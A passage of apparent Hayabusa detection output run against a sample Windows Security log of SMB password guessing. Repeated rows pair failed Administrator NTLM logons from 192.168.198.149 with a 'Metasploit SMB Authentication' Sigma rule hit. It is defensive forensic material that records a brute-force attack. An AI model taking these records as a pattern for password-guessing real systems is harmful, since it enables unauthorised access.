SMB Authentication,,rules/sigma/builtin/security/win_metasploit_authentication.yml,../hayabusa-sample-evtx/DeepBlueCLI/smb-password-guessing-security.evtx +2016-09-20 01:52:11.666 +09:00,DESKTOP-M5SN04R,4625,low,Logon Failure - Wrong Password,User: Administrator : Type: 3 : Workstation: kyTH0jxSZB2YVdhW : IP Address: 192.168.198.149 : AuthPackage: NTLM,rules/hayabusa/default/alerts/Security/4625_LateralMovement_LogonFailure-WrongPassword.yml,../hayabusa-sample-evtx/DeepBlueCLI/smb-password-guessing-security.evtx +2016-09-20 01:52:11.666 +09:00,DESKTOP-M5SN04R,4625,high,Metasploit SMB Authentication,,rules/sigma/builtin/security/win_metasploit_authentication.yml,../hayabusa-sample-evtx/DeepBlueCLI/smb-password-guessing-security.evtx +2016-09-20 01:52:11.709 +09:00,DESKTOP-M5SN04R,4625,low,Logon Failure - Wrong Password,User: Administrator : Type: 3 : Workstation: NRq5XrcDkFvabCzh : IP Address: 192.168.198.149 : AuthPackage: NTLM,rules/hayabusa/default/alerts/Security/4625_LateralMovement_LogonFailure-WrongPassword.yml,../hayabusa-sample-evtx/DeepBlueCLI/smb-password-guessing-security.evtx +2016-09-20 01:52:11.709 +09:00,DESKTOP-M5SN04R,4625,high,Metasploit SMB Authentication,,rules/sigma/builtin/security/win_metasploit_authentication.yml,../hayabusa-sample-evtx/DeepBlueCLI/smb-password-guessing-security.evtx +2016-09-20 01:52:11.750 +09:00,DESKTOP-M5SN04R,4625,low,Logon Failure - Wrong Password,User: Administrator : Type: 3 : Workstation: zlYwlgrsMy1kSgEC : IP Address: 192.168.198.149 : AuthPackage: NTLM,rules/hayabusa/default/alerts/Security/4625_LateralMovement_LogonFailure-WrongPassword.yml,../hayabusa-sample-evtx/DeepBlueCLI/smb-password-guessing-security.evtx +2016-09-20 01:52:11.750 +09:00,DESKTOP-M5SN04R,4625,high,Metasploit SMB Authentication,,rules/sigma/builtin/security/win_metasploit_authentication.yml,../hayabusa-sample-evtx/DeepBlueCLI/smb-password-guessing-security.evtx +2016-09-20 01:52:11.790 +09:00,DESKTOP-M5SN04R,4625,low,Logon Failure - Wrong 
Password,User: Administrator : Type: 3 : Workstation: AchwW4ifbZ41AQNg : IP Address: 192.168.198.149 : AuthPackage: NTLM,rules/hayabusa/default/alerts/Security/4625_LateralMovement_LogonFailure-WrongPassword.yml,../hayabusa-sample-evtx/DeepBlueCLI/smb-password-guessing-security.evtx +2016-09-20 01:52:11.790 +09:00,DESKTOP-M5SN04R,4625,high,Metasploit SMB Authentication,,rules/sigma/builtin/security/win_metasploit_authentication.yml,../hayabusa-sample-evtx/DeepBlueCLI/smb-password-guessing-security.evtx +2016-09-20 01:52:11.842 +09:00,DESKTOP-M5SN04R,4625,low,Logon Failure - Wrong Password,User: Administrator : Type: 3 : Workstation: 1PaxF7Q8ue1Kex1h : IP Address: 192.168.198.149 : AuthPackage: NTLM,rules/hayabusa/default/alerts/Security/4625_LateralMovement_LogonFailure-WrongPassword.yml,../hayabusa-sample-evtx/DeepBlueCLI/smb-password-guessing-security.evtx +2016-09-20 01:52:11.842 +09:00,DESKTOP-M5SN04R,4625,high,Metasploit SMB Authentication,,rules/sigma/builtin/security/win_metasploit_authentication.yml,../hayabusa-sample-evtx/DeepBlueCLI/smb-password-guessing-security.evtx +2016-09-20 01:52:11.888 +09:00,DESKTOP-M5SN04R,4625,low,Logon Failure - Wrong Password,User: Administrator : Type: 3 : Workstation: WAhW2PErXdwNVrx5 : IP Address: 192.168.198.149 : AuthPackage: NTLM,rules/hayabusa/default/alerts/Security/4625_LateralMovement_LogonFailure-WrongPassword.yml,../hayabusa-sample-evtx/DeepBlueCLI/smb-password-guessing-security.evtx +2016-09-20 01:52:11.888 +09:00,DESKTOP-M5SN04R,4625,high,Metasploit SMB Authentication,,rules/sigma/builtin/security/win_metasploit_authentication.yml,../hayabusa-sample-evtx/DeepBlueCLI/smb-password-guessing-security.evtx +2016-09-20 01:52:11.943 +09:00,DESKTOP-M5SN04R,4625,low,Logon Failure - Wrong Password,User: Administrator : Type: 3 : Workstation: LoAV3ESqieev2JMC : IP Address: 192.168.198.149 : AuthPackage: 
NTLM,rules/hayabusa/default/alerts/Security/4625_LateralMovement_LogonFailure-WrongPassword.yml,../hayabusa-sample-evtx/DeepBlueCLI/smb-password-guessing-security.evtx +2016-09-20 01:52:11.943 +09:00,DESKTOP-M5SN04R,4625,high,Metasploit SMB Authentication,,rules/sigma/builtin/security/win_metasploit_authentication.yml,../hayabusa-sample-evtx/DeepBlueCLI/smb-password-guessing-security.evtx +2016-09-20 01:52:12.012 +09:00,DESKTOP-M5SN04R,4625,low,Logon Failure - Wrong Password,User: Administrator : Type: 3 : Workstation: wFlWFijaFirgsAtJ : IP Address: 192.168.198.149 : AuthPackage: NTLM,rules/hayabusa/default/alerts/Security/4625_LateralMovement_LogonFailure-WrongPassword.yml,../hayabusa-sample-evtx/DeepBlueCLI/smb-password-guessing-security.evtx +2016-09-20 01:52:12.012 +09:00,DESKTOP-M5SN04R,4625,high,Metasploit SMB Authentication,,rules/sigma/builtin/security/win_metasploit_authentication.yml,../hayabusa-sample-evtx/DeepBlueCLI/smb-password-guessing-security.evtx +2016-09-20 01:52:12.049 +09:00,DESKTOP-M5SN04R,4625,low,Logon Failure - Wrong Password,User: Administrator : Type: 3 : Workstation: hSDjuqvzKLaWCWVo : IP Address: 192.168.198.149 : AuthPackage: NTLM,rules/hayabusa/default/alerts/Security/4625_LateralMovement_LogonFailure-WrongPassword.yml,../hayabusa-sample-evtx/DeepBlueCLI/smb-password-guessing-security.evtx +2016-09-20 01:52:12.049 +09:00,DESKTOP-M5SN04R,4625,high,Metasploit SMB Authentication,,rules/sigma/builtin/security/win_metasploit_authentication.yml,../hayabusa-sample-evtx/DeepBlueCLI/smb-password-guessing-security.evtx +2016-09-20 01:52:12.109 +09:00,DESKTOP-M5SN04R,4625,low,Logon Failure - Wrong Password,User: Administrator : Type: 3 : Workstation: SL0CVu787iFRLiPU : IP Address: 192.168.198.149 : AuthPackage: NTLM,rules/hayabusa/default/alerts/Security/4625_LateralMovement_LogonFailure-WrongPassword.yml,../hayabusa-sample-evtx/DeepBlueCLI/smb-password-guessing-security.evtx +2016-09-20 01:52:12.109 +09:00,DESKTOP-M5SN04R,4625,high,Metasploit 
SMB Authentication,,rules/sigma/builtin/security/win_metasploit_authentication.yml,../hayabusa-sample-evtx/DeepBlueCLI/smb-password-guessing-security.evtx +2016-09-20 01:52:12.219 +09:00,DESKTOP-M5SN04R,4625,low,Logon Failure - Wrong Password,User: Administrator : Type: 3 : Workstation: ZQDORN33izpv4tGO : IP Address: 192.168.198.149 : AuthPackage: NTLM,rules/hayabusa/default/alerts/Security/4625_LateralMovement_LogonFailure-WrongPassword.yml,../hayabusa-sample-evtx/DeepBlueCLI/smb-password-guessing-security.evtx +2016-09-20 01:52:12.219 +09:00,DESKTOP-M5SN04R,4625,high,Metasploit SMB Authentication,,rules/sigma/builtin/security/win_metasploit_authentication.yml,../hayabusa-sample-evtx/DeepBlueCLI/smb-password-guessing-security.evtx +2016-09-20 01:52:12.253 +09:00,DESKTOP-M5SN04R,4625,low,Logon Failure - Wrong Password,User: Administrator : Type: 3 : Workstation: v470yorD43fgGyjC : IP Address: 192.168.198.149 : AuthPackage: NTLM,rules/hayabusa/default/alerts/Security/4625_LateralMovement_LogonFailure-WrongPassword.yml,../hayabusa-sample-evtx/DeepBlueCLI/smb-password-guessing-security.evtx +2016-09-20 01:52:12.253 +09:00,DESKTOP-M5SN04R,4625,high,Metasploit SMB Authentication,,rules/sigma/builtin/security/win_metasploit_authentication.yml,../hayabusa-sample-evtx/DeepBlueCLI/smb-password-guessing-security.evtx +2016-09-20 01:52:12.305 +09:00,DESKTOP-M5SN04R,4625,low,Logon Failure - Wrong Password,User: Administrator : Type: 3 : Workstation: LBbLWVZFDqFxb7dW : IP Address: 192.168.198.149 : AuthPackage: NTLM,rules/hayabusa/default/alerts/Security/4625_LateralMovement_LogonFailure-WrongPassword.yml,../hayabusa-sample-evtx/DeepBlueCLI/smb-password-guessing-security.evtx +2016-09-20 01:52:12.305 +09:00,DESKTOP-M5SN04R,4625,high,Metasploit SMB Authentication,,rules/sigma/builtin/security/win_metasploit_authentication.yml,../hayabusa-sample-evtx/DeepBlueCLI/smb-password-guessing-security.evtx +2016-09-20 01:52:12.360 +09:00,DESKTOP-M5SN04R,4625,low,Logon Failure - Wrong 
Password,User: Administrator : Type: 3 : Workstation: RJsowt9MrhXciLOZ : IP Address: 192.168.198.149 : AuthPackage: NTLM,rules/hayabusa/default/alerts/Security/4625_LateralMovement_LogonFailure-WrongPassword.yml,../hayabusa-sample-evtx/DeepBlueCLI/smb-password-guessing-security.evtx +2016-09-20 01:52:12.360 +09:00,DESKTOP-M5SN04R,4625,high,Metasploit SMB Authentication,,rules/sigma/builtin/security/win_metasploit_authentication.yml,../hayabusa-sample-evtx/DeepBlueCLI/smb-password-guessing-security.evtx +2016-09-20 01:52:12.404 +09:00,DESKTOP-M5SN04R,4625,low,Logon Failure - Wrong Password,User: Administrator : Type: 3 : Workstation: uhCVFyMmDI5shASV : IP Address: 192.168.198.149 : AuthPackage: NTLM,rules/hayabusa/default/alerts/Security/4625_LateralMovement_LogonFailure-WrongPassword.yml,../hayabusa-sample-evtx/DeepBlueCLI/smb-password-guessing-security.evtx +2016-09-20 01:52:12.404 +09:00,DESKTOP-M5SN04R,4625,high,Metasploit SMB Authentication,,rules/sigma/builtin/security/win_metasploit_authentication.yml,../hayabusa-sample-evtx/DeepBlueCLI/smb-password-guessing-security.evtx +2016-09-20 01:52:12.452 +09:00,DESKTOP-M5SN04R,4625,low,Logon Failure - Wrong Password,User: Administrator : Type: 3 : Workstation: yd4SM9EGM7cnO6Z5 : IP Address: 192.168.198.149 : AuthPackage: NTLM,rules/hayabusa/default/alerts/Security/4625_LateralMovement_LogonFailure-WrongPassword.yml,../hayabusa-sample-evtx/DeepBlueCLI/smb-password-guessing-security.evtx +2016-09-20 01:52:12.452 +09:00,DESKTOP-M5SN04R,4625,high,Metasploit SMB Authentication,,rules/sigma/builtin/security/win_metasploit_authentication.yml,../hayabusa-sample-evtx/DeepBlueCLI/smb-password-guessing-security.evtx +2016-09-20 01:52:12.490 +09:00,DESKTOP-M5SN04R,4625,low,Logon Failure - Wrong Password,User: Administrator : Type: 3 : Workstation: PSR1tbtzdDaJDbXs : IP Address: 192.168.198.149 : AuthPackage: 
NTLM,rules/hayabusa/default/alerts/Security/4625_LateralMovement_LogonFailure-WrongPassword.yml,../hayabusa-sample-evtx/DeepBlueCLI/smb-password-guessing-security.evtx +2016-09-20 01:52:12.490 +09:00,DESKTOP-M5SN04R,4625,high,Metasploit SMB Authentication,,rules/sigma/builtin/security/win_metasploit_authentication.yml,../hayabusa-sample-evtx/DeepBlueCLI/smb-password-guessing-security.evtx +2016-09-20 01:52:12.538 +09:00,DESKTOP-M5SN04R,4625,low,Logon Failure - Wrong Password,User: Administrator : Type: 3 : Workstation: rNqyjBuN0Pq6WRO1 : IP Address: 192.168.198.149 : AuthPackage: NTLM,rules/hayabusa/default/alerts/Security/4625_LateralMovement_LogonFailure-WrongPassword.yml,../hayabusa-sample-evtx/DeepBlueCLI/smb-password-guessing-security.evtx +2016-09-20 01:52:12.538 +09:00,DESKTOP-M5SN04R,4625,high,Metasploit SMB Authentication,,rules/sigma/builtin/security/win_metasploit_authentication.yml,../hayabusa-sample-evtx/DeepBlueCLI/smb-password-guessing-security.evtx +2016-09-20 01:52:12.585 +09:00,DESKTOP-M5SN04R,4625,low,Logon Failure - Wrong Password,User: Administrator : Type: 3 : Workstation: vqpMAmE9OvHbFCh2 : IP Address: 192.168.198.149 : AuthPackage: NTLM,rules/hayabusa/default/alerts/Security/4625_LateralMovement_LogonFailure-WrongPassword.yml,../hayabusa-sample-evtx/DeepBlueCLI/smb-password-guessing-security.evtx +2016-09-20 01:52:12.585 +09:00,DESKTOP-M5SN04R,4625,high,Metasploit SMB Authentication,,rules/sigma/builtin/security/win_metasploit_authentication.yml,../hayabusa-sample-evtx/DeepBlueCLI/smb-password-guessing-security.evtx +2016-09-20 01:52:12.632 +09:00,DESKTOP-M5SN04R,4625,low,Logon Failure - Wrong Password,User: Administrator : Type: 3 : Workstation: JfLQAaB0DPvxWQMB : IP Address: 192.168.198.149 : AuthPackage: NTLM,rules/hayabusa/default/alerts/Security/4625_LateralMovement_LogonFailure-WrongPassword.yml,../hayabusa-sample-evtx/DeepBlueCLI/smb-password-guessing-security.evtx +2016-09-20 01:52:12.632 +09:00,DESKTOP-M5SN04R,4625,high,Metasploit 
SMB Authentication,,rules/sigma/builtin/security/win_metasploit_authentication.yml,../hayabusa-sample-evtx/DeepBlueCLI/smb-password-guessing-security.evtx +2016-09-20 01:52:12.676 +09:00,DESKTOP-M5SN04R,4625,low,Logon Failure - Wrong Password,User: Administrator : Type: 3 : Workstation: A0kvHMwnj2k0HMLQ : IP Address: 192.168.198.149 : AuthPackage: NTLM,rules/hayabusa/default/alerts/Security/4625_LateralMovement_LogonFailure-WrongPassword.yml,../hayabusa-sample-evtx/DeepBlueCLI/smb-password-guessing-security.evtx +2016-09-20 01:52:12.676 +09:00,DESKTOP-M5SN04R,4625,high,Metasploit SMB Authentication,,rules/sigma/builtin/security/win_metasploit_authentication.yml,../hayabusa-sample-evtx/DeepBlueCLI/smb-password-guessing-security.evtx +2016-09-20 01:52:12.712 +09:00,DESKTOP-M5SN04R,4625,low,Logon Failure - Wrong Password,User: Administrator : Type: 3 : Workstation: kPqfVDftcR4iRDaw : IP Address: 192.168.198.149 : AuthPackage: NTLM,rules/hayabusa/default/alerts/Security/4625_LateralMovement_LogonFailure-WrongPassword.yml,../hayabusa-sample-evtx/DeepBlueCLI/smb-password-guessing-security.evtx +2016-09-20 01:52:12.712 +09:00,DESKTOP-M5SN04R,4625,high,Metasploit SMB Authentication,,rules/sigma/builtin/security/win_metasploit_authentication.yml,../hayabusa-sample-evtx/DeepBlueCLI/smb-password-guessing-security.evtx +2016-09-20 01:52:12.748 +09:00,DESKTOP-M5SN04R,4625,low,Logon Failure - Wrong Password,User: Administrator : Type: 3 : Workstation: 1bltwm2g13InAJM6 : IP Address: 192.168.198.149 : AuthPackage: NTLM,rules/hayabusa/default/alerts/Security/4625_LateralMovement_LogonFailure-WrongPassword.yml,../hayabusa-sample-evtx/DeepBlueCLI/smb-password-guessing-security.evtx +2016-09-20 01:52:12.748 +09:00,DESKTOP-M5SN04R,4625,high,Metasploit SMB Authentication,,rules/sigma/builtin/security/win_metasploit_authentication.yml,../hayabusa-sample-evtx/DeepBlueCLI/smb-password-guessing-security.evtx +2016-09-20 01:52:12.788 +09:00,DESKTOP-M5SN04R,4625,low,Logon Failure - Wrong 
Password,User: Administrator : Type: 3 : Workstation: J2iFr8ppe5NzukXF : IP Address: 192.168.198.149 : AuthPackage: NTLM,rules/hayabusa/default/alerts/Security/4625_LateralMovement_LogonFailure-WrongPassword.yml,../hayabusa-sample-evtx/DeepBlueCLI/smb-password-guessing-security.evtx +2016-09-20 01:52:12.788 +09:00,DESKTOP-M5SN04R,4625,high,Metasploit SMB Authentication,,rules/sigma/builtin/security/win_metasploit_authentication.yml,../hayabusa-sample-evtx/DeepBlueCLI/smb-password-guessing-security.evtx +2016-09-20 01:52:12.842 +09:00,DESKTOP-M5SN04R,4625,low,Logon Failure - Wrong Password,User: Administrator : Type: 3 : Workstation: 7EEUOBohBFRze6hL : IP Address: 192.168.198.149 : AuthPackage: NTLM,rules/hayabusa/default/alerts/Security/4625_LateralMovement_LogonFailure-WrongPassword.yml,../hayabusa-sample-evtx/DeepBlueCLI/smb-password-guessing-security.evtx +2016-09-20 01:52:12.842 +09:00,DESKTOP-M5SN04R,4625,high,Metasploit SMB Authentication,,rules/sigma/builtin/security/win_metasploit_authentication.yml,../hayabusa-sample-evtx/DeepBlueCLI/smb-password-guessing-security.evtx +2016-09-20 01:52:12.887 +09:00,DESKTOP-M5SN04R,4625,low,Logon Failure - Wrong Password,User: Administrator : Type: 3 : Workstation: NCOFn3WM71KmaZyB : IP Address: 192.168.198.149 : AuthPackage: NTLM,rules/hayabusa/default/alerts/Security/4625_LateralMovement_LogonFailure-WrongPassword.yml,../hayabusa-sample-evtx/DeepBlueCLI/smb-password-guessing-security.evtx +2016-09-20 01:52:12.887 +09:00,DESKTOP-M5SN04R,4625,high,Metasploit SMB Authentication,,rules/sigma/builtin/security/win_metasploit_authentication.yml,../hayabusa-sample-evtx/DeepBlueCLI/smb-password-guessing-security.evtx +2016-09-20 01:52:12.928 +09:00,DESKTOP-M5SN04R,4625,low,Logon Failure - Wrong Password,User: Administrator : Type: 3 : Workstation: UdUkBxB1auduRfdS : IP Address: 192.168.198.149 : AuthPackage: 
NTLM,rules/hayabusa/default/alerts/Security/4625_LateralMovement_LogonFailure-WrongPassword.yml,../hayabusa-sample-evtx/DeepBlueCLI/smb-password-guessing-security.evtx +2016-09-20 01:52:12.928 +09:00,DESKTOP-M5SN04R,4625,high,Metasploit SMB Authentication,,rules/sigma/builtin/security/win_metasploit_authentication.yml,../hayabusa-sample-evtx/DeepBlueCLI/smb-password-guessing-security.evtx +2016-09-20 01:52:12.980 +09:00,DESKTOP-M5SN04R,4625,low,Logon Failure - Wrong Password,User: Administrator : Type: 3 : Workstation: E2JaWoYK56HRGfW1 : IP Address: 192.168.198.149 : AuthPackage: NTLM,rules/hayabusa/default/alerts/Security/4625_LateralMovement_LogonFailure-WrongPassword.yml,../hayabusa-sample-evtx/DeepBlueCLI/smb-password-guessing-security.evtx +2016-09-20 01:52:12.980 +09:00,DESKTOP-M5SN04R,4625,high,Metasploit SMB Authentication,,rules/sigma/builtin/security/win_metasploit_authentication.yml,../hayabusa-sample-evtx/DeepBlueCLI/smb-password-guessing-security.evtx +2016-09-20 01:52:13.015 +09:00,DESKTOP-M5SN04R,4625,low,Logon Failure - Wrong Password,User: Administrator : Type: 3 : Workstation: a3JTCX9NIOpg6TFB : IP Address: 192.168.198.149 : AuthPackage: NTLM,rules/hayabusa/default/alerts/Security/4625_LateralMovement_LogonFailure-WrongPassword.yml,../hayabusa-sample-evtx/DeepBlueCLI/smb-password-guessing-security.evtx +2016-09-20 01:52:13.015 +09:00,DESKTOP-M5SN04R,4625,high,Metasploit SMB Authentication,,rules/sigma/builtin/security/win_metasploit_authentication.yml,../hayabusa-sample-evtx/DeepBlueCLI/smb-password-guessing-security.evtx +2016-09-20 01:52:13.064 +09:00,DESKTOP-M5SN04R,4625,low,Logon Failure - Wrong Password,User: Administrator : Type: 3 : Workstation: zFGkdUVAdKcrrREB : IP Address: 192.168.198.149 : AuthPackage: NTLM,rules/hayabusa/default/alerts/Security/4625_LateralMovement_LogonFailure-WrongPassword.yml,../hayabusa-sample-evtx/DeepBlueCLI/smb-password-guessing-security.evtx +2016-09-20 01:52:13.064 +09:00,DESKTOP-M5SN04R,4625,high,Metasploit 
SMB Authentication,,rules/sigma/builtin/security/win_metasploit_authentication.yml,../hayabusa-sample-evtx/DeepBlueCLI/smb-password-guessing-security.evtx +2016-09-20 01:52:13.108 +09:00,DESKTOP-M5SN04R,4625,low,Logon Failure - Wrong Password,User: Administrator : Type: 3 : Workstation: 7oZW00FpKema01Vw : IP Address: 192.168.198.149 : AuthPackage: NTLM,rules/hayabusa/default/alerts/Security/4625_LateralMovement_LogonFailure-WrongPassword.yml,../hayabusa-sample-evtx/DeepBlueCLI/smb-password-guessing-security.evtx +2016-09-20 01:52:13.108 +09:00,DESKTOP-M5SN04R,4625,high,Metasploit SMB Authentication,,rules/sigma/builtin/security/win_metasploit_authentication.yml,../hayabusa-sample-evtx/DeepBlueCLI/smb-password-guessing-security.evtx +2016-09-20 01:52:13.151 +09:00,DESKTOP-M5SN04R,4625,low,Logon Failure - Wrong Password,User: Administrator : Type: 3 : Workstation: p4HbNQx0Acf83b1h : IP Address: 192.168.198.149 : AuthPackage: NTLM,rules/hayabusa/default/alerts/Security/4625_LateralMovement_LogonFailure-WrongPassword.yml,../hayabusa-sample-evtx/DeepBlueCLI/smb-password-guessing-security.evtx +2016-09-20 01:52:13.151 +09:00,DESKTOP-M5SN04R,4625,high,Metasploit SMB Authentication,,rules/sigma/builtin/security/win_metasploit_authentication.yml,../hayabusa-sample-evtx/DeepBlueCLI/smb-password-guessing-security.evtx +2016-09-20 01:52:13.196 +09:00,DESKTOP-M5SN04R,4625,low,Logon Failure - Wrong Password,User: Administrator : Type: 3 : Workstation: j9aM5UCQbOLvcpI0 : IP Address: 192.168.198.149 : AuthPackage: NTLM,rules/hayabusa/default/alerts/Security/4625_LateralMovement_LogonFailure-WrongPassword.yml,../hayabusa-sample-evtx/DeepBlueCLI/smb-password-guessing-security.evtx +2016-09-20 01:52:13.196 +09:00,DESKTOP-M5SN04R,4625,high,Metasploit SMB Authentication,,rules/sigma/builtin/security/win_metasploit_authentication.yml,../hayabusa-sample-evtx/DeepBlueCLI/smb-password-guessing-security.evtx +2016-09-20 01:52:13.238 +09:00,DESKTOP-M5SN04R,4625,low,Logon Failure - Wrong 
Password,User: Administrator : Type: 3 : Workstation: BGGChEAIdej9lBhr : IP Address: 192.168.198.149 : AuthPackage: NTLM,rules/hayabusa/default/alerts/Security/4625_LateralMovement_LogonFailure-WrongPassword.yml,../hayabusa-sample-evtx/DeepBlueCLI/smb-password-guessing-security.evtx +2016-09-20 01:52:13.238 +09:00,DESKTOP-M5SN04R,4625,high,Metasploit SMB Authentication,,rules/sigma/builtin/security/win_metasploit_authentication.yml,../hayabusa-sample-evtx/DeepBlueCLI/smb-password-guessing-security.evtx +2016-09-20 01:52:13.288 +09:00,DESKTOP-M5SN04R,4625,low,Logon Failure - Wrong Password,User: Administrator : Type: 3 : Workstation: 4CaFYB1ImWAWbH0W : IP Address: 192.168.198.149 : AuthPackage: NTLM,rules/hayabusa/default/alerts/Security/4625_LateralMovement_LogonFailure-WrongPassword.yml,../hayabusa-sample-evtx/DeepBlueCLI/smb-password-guessing-security.evtx +2016-09-20 01:52:13.288 +09:00,DESKTOP-M5SN04R,4625,high,Metasploit SMB Authentication,,rules/sigma/builtin/security/win_metasploit_authentication.yml,../hayabusa-sample-evtx/DeepBlueCLI/smb-password-guessing-security.evtx +2016-09-20 01:52:13.320 +09:00,DESKTOP-M5SN04R,4625,low,Logon Failure - Wrong Password,User: Administrator : Type: 3 : Workstation: OLa3lkxWiJ00raQh : IP Address: 192.168.198.149 : AuthPackage: NTLM,rules/hayabusa/default/alerts/Security/4625_LateralMovement_LogonFailure-WrongPassword.yml,../hayabusa-sample-evtx/DeepBlueCLI/smb-password-guessing-security.evtx +2016-09-20 01:52:13.320 +09:00,DESKTOP-M5SN04R,4625,high,Metasploit SMB Authentication,,rules/sigma/builtin/security/win_metasploit_authentication.yml,../hayabusa-sample-evtx/DeepBlueCLI/smb-password-guessing-security.evtx +2016-09-20 01:52:13.364 +09:00,DESKTOP-M5SN04R,4625,low,Logon Failure - Wrong Password,User: Administrator : Type: 3 : Workstation: vMzyi0jIVLNrodC8 : IP Address: 192.168.198.149 : AuthPackage: 
NTLM,rules/hayabusa/default/alerts/Security/4625_LateralMovement_LogonFailure-WrongPassword.yml,../hayabusa-sample-evtx/DeepBlueCLI/smb-password-guessing-security.evtx +2016-09-20 01:52:13.364 +09:00,DESKTOP-M5SN04R,4625,high,Metasploit SMB Authentication,,rules/sigma/builtin/security/win_metasploit_authentication.yml,../hayabusa-sample-evtx/DeepBlueCLI/smb-password-guessing-security.evtx +2016-09-20 01:52:13.409 +09:00,DESKTOP-M5SN04R,4625,low,Logon Failure - Wrong Password,User: Administrator : Type: 3 : Workstation: n2repX0roAP2j0TI : IP Address: 192.168.198.149 : AuthPackage: NTLM,rules/hayabusa/default/alerts/Security/4625_LateralMovement_LogonFailure-WrongPassword.yml,../hayabusa-sample-evtx/DeepBlueCLI/smb-password-guessing-security.evtx +2016-09-20 01:52:13.409 +09:00,DESKTOP-M5SN04R,4625,high,Metasploit SMB Authentication,,rules/sigma/builtin/security/win_metasploit_authentication.yml,../hayabusa-sample-evtx/DeepBlueCLI/smb-password-guessing-security.evtx +2016-09-20 01:52:13.460 +09:00,DESKTOP-M5SN04R,4625,low,Logon Failure - Wrong Password,User: Administrator : Type: 3 : Workstation: gqcpIjdkNpmoTe4A : IP Address: 192.168.198.149 : AuthPackage: NTLM,rules/hayabusa/default/alerts/Security/4625_LateralMovement_LogonFailure-WrongPassword.yml,../hayabusa-sample-evtx/DeepBlueCLI/smb-password-guessing-security.evtx +2016-09-20 01:52:13.460 +09:00,DESKTOP-M5SN04R,4625,high,Metasploit SMB Authentication,,rules/sigma/builtin/security/win_metasploit_authentication.yml,../hayabusa-sample-evtx/DeepBlueCLI/smb-password-guessing-security.evtx +2016-09-20 01:52:13.488 +09:00,DESKTOP-M5SN04R,4625,low,Logon Failure - Wrong Password,User: Administrator : Type: 3 : Workstation: Edgo9UdNvmMJpiyn : IP Address: 192.168.198.149 : AuthPackage: NTLM,rules/hayabusa/default/alerts/Security/4625_LateralMovement_LogonFailure-WrongPassword.yml,../hayabusa-sample-evtx/DeepBlueCLI/smb-password-guessing-security.evtx +2016-09-20 01:52:13.488 +09:00,DESKTOP-M5SN04R,4625,high,Metasploit 
SMB Authentication,,rules/sigma/builtin/security/win_metasploit_authentication.yml,../hayabusa-sample-evtx/DeepBlueCLI/smb-password-guessing-security.evtx +2016-09-20 01:52:13.532 +09:00,DESKTOP-M5SN04R,4625,low,Logon Failure - Wrong Password,User: Administrator : Type: 3 : Workstation: LpqOTu7Xn7ULipmN : IP Address: 192.168.198.149 : AuthPackage: NTLM,rules/hayabusa/default/alerts/Security/4625_LateralMovement_LogonFailure-WrongPassword.yml,../hayabusa-sample-evtx/DeepBlueCLI/smb-password-guessing-security.evtx +2016-09-20 01:52:13.532 +09:00,DESKTOP-M5SN04R,4625,high,Metasploit SMB Authentication,,rules/sigma/builtin/security/win_metasploit_authentication.yml,../hayabusa-sample-evtx/DeepBlueCLI/smb-password-guessing-security.evtx +2016-09-20 01:52:13.567 +09:00,DESKTOP-M5SN04R,4625,low,Logon Failure - Wrong Password,User: Administrator : Type: 3 : Workstation: TP0efL79STMbuu9g : IP Address: 192.168.198.149 : AuthPackage: NTLM,rules/hayabusa/default/alerts/Security/4625_LateralMovement_LogonFailure-WrongPassword.yml,../hayabusa-sample-evtx/DeepBlueCLI/smb-password-guessing-security.evtx +2016-09-20 01:52:13.567 +09:00,DESKTOP-M5SN04R,4625,high,Metasploit SMB Authentication,,rules/sigma/builtin/security/win_metasploit_authentication.yml,../hayabusa-sample-evtx/DeepBlueCLI/smb-password-guessing-security.evtx +2016-09-20 01:52:13.610 +09:00,DESKTOP-M5SN04R,4625,low,Logon Failure - Wrong Password,User: Administrator : Type: 3 : Workstation: HkwWfRi0E5sVY6UT : IP Address: 192.168.198.149 : AuthPackage: NTLM,rules/hayabusa/default/alerts/Security/4625_LateralMovement_LogonFailure-WrongPassword.yml,../hayabusa-sample-evtx/DeepBlueCLI/smb-password-guessing-security.evtx +2016-09-20 01:52:13.610 +09:00,DESKTOP-M5SN04R,4625,high,Metasploit SMB Authentication,,rules/sigma/builtin/security/win_metasploit_authentication.yml,../hayabusa-sample-evtx/DeepBlueCLI/smb-password-guessing-security.evtx +2016-09-20 01:52:13.657 +09:00,DESKTOP-M5SN04R,4625,low,Logon Failure - Wrong 
Password,User: Administrator : Type: 3 : Workstation: IkyCe9NXGExCQS5r : IP Address: 192.168.198.149 : AuthPackage: NTLM,rules/hayabusa/default/alerts/Security/4625_LateralMovement_LogonFailure-WrongPassword.yml,../hayabusa-sample-evtx/DeepBlueCLI/smb-password-guessing-security.evtx +2016-09-20 01:52:13.657 +09:00,DESKTOP-M5SN04R,4625,high,Metasploit SMB Authentication,,rules/sigma/builtin/security/win_metasploit_authentication.yml,../hayabusa-sample-evtx/DeepBlueCLI/smb-password-guessing-security.evtx +2016-09-20 01:52:13.698 +09:00,DESKTOP-M5SN04R,4625,low,Logon Failure - Wrong Password,User: Administrator : Type: 3 : Workstation: IGnhRwa7P7by9vJO : IP Address: 192.168.198.149 : AuthPackage: NTLM,rules/hayabusa/default/alerts/Security/4625_LateralMovement_LogonFailure-WrongPassword.yml,../hayabusa-sample-evtx/DeepBlueCLI/smb-password-guessing-security.evtx +2016-09-20 01:52:13.698 +09:00,DESKTOP-M5SN04R,4625,high,Metasploit SMB Authentication,,rules/sigma/builtin/security/win_metasploit_authentication.yml,../hayabusa-sample-evtx/DeepBlueCLI/smb-password-guessing-security.evtx +2016-09-20 01:52:13.740 +09:00,DESKTOP-M5SN04R,4625,low,Logon Failure - Wrong Password,User: Administrator : Type: 3 : Workstation: fh7IGliNbSyKwxpM : IP Address: 192.168.198.149 : AuthPackage: NTLM,rules/hayabusa/default/alerts/Security/4625_LateralMovement_LogonFailure-WrongPassword.yml,../hayabusa-sample-evtx/DeepBlueCLI/smb-password-guessing-security.evtx +2016-09-20 01:52:13.740 +09:00,DESKTOP-M5SN04R,4625,high,Metasploit SMB Authentication,,rules/sigma/builtin/security/win_metasploit_authentication.yml,../hayabusa-sample-evtx/DeepBlueCLI/smb-password-guessing-security.evtx +2016-09-20 01:52:13.782 +09:00,DESKTOP-M5SN04R,4625,low,Logon Failure - Wrong Password,User: Administrator : Type: 3 : Workstation: 1QfgWsAqSYQfB9l5 : IP Address: 192.168.198.149 : AuthPackage: 
